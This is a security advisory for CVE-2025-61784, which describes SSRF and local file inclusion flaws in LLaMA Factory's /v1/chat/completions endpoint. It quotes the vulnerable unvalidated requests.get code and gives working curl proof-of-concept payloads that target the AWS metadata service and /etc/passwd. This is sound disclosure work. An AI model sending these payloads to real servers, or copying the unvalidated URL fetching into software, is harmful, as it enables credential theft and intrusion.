CVE-2025-61784
LLaMA Factory's Chat API Contains Critical SSRF and LFI Vulnerabilities
Description
## Summary ## A Server-Side Request Forgery (SSRF) vulnerability in the chat API allows any authenticated user to force the server to make arbitrary HTTP requests to internal and external networks. This can lead to the exposure of sensitive internal services, reconnaissance of the internal network, or interaction with third-party services. The same mechanism also allows for a Local File Inclusion (LFI) vulnerability, enabling users to read arbitrary files from the server's filesystem. ## Details ## The vulnerability exists in the _process_request function within src/llamafactory/api/chat.py. This function is responsible for processing incoming multimodal content, including images, videos, and audio provided via URLs. The function checks if the provided URL is a base64 data URI or a local file path (os.path.isfile). If neither is true, it falls back to treating the URL as a web URI and makes a direct HTTP GET request using requests.get(url, stream=True).raw without any validation or sanitization of the URL. Vulnerable Code Snippets in _process_request: ``` # ... elif input_item.type == "image_url": # ... else: # web uri image_stream = requests.get(image_url, stream=True).raw # ... elif input_item.type == "video_url": # ... else: # web uri video_stream = requests.get(video_url, stream=True).raw # ... elif input_item.type == "audio_url": # ... else: # web uri audio_stream = requests.get(audio_url, stream=True).raw # ... ``` This vulnerable function is called by create_chat_completion_response and create_stream_chat_completion_response, which are in turn called by the public-facing /v1/chat/completions API endpoint in src/llamafactory/api/app.py. A user can craft a request to this endpoint containing a malicious URL in the messages payload to trigger the vulnerability. ## PoC ## To reproduce the vulnerability, send a POST request to the /v1/chat/completions endpoint with a JSON payload containing a URL that points to an internal or controlled external service. Start the LLaMA Factory API server. Use curl to send the malicious request. The following example uses a URL pointing to the AWS metadata service, a common SSRF attack vector. SSRF Payload: ``` curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer your_api_key" \ -d '{ "model": "your-model-name", "messages": [ { "role": "user", "content": [ { "type": "text", "text": "What is in this image?" }, { "type": "image_url", "image_url": { "url": "http://169.254.169.254/latest/meta-data/" } } ] } ] }' ``` LFI Payload: ``` curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer your_api_key" \ -d '{ "model": "your-model-name", "messages": [ { "role": "user", "content": [ { "type": "text", "text": "What is in this image?" }, { "type": "image_url", "image_url": { "url": "/etc/passwd" } } ] } ] }' ``` The server will make a request to the specified URL or read the specified local file. ## Impact ## Vulnerability Type: Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI). Impacted Component: The API server, specifically the /v1/chat/completions endpoint. Who is impacted: Any user who can send requests to the chat API. The vulnerability allows an attacker to bypass firewalls and access internal network resources, query cloud metadata services for credentials, or read sensitive files on the server. The severity is critical. ## Credits Wenhao Wu, ChengGao, Alibaba Cloud Intelligence Security Team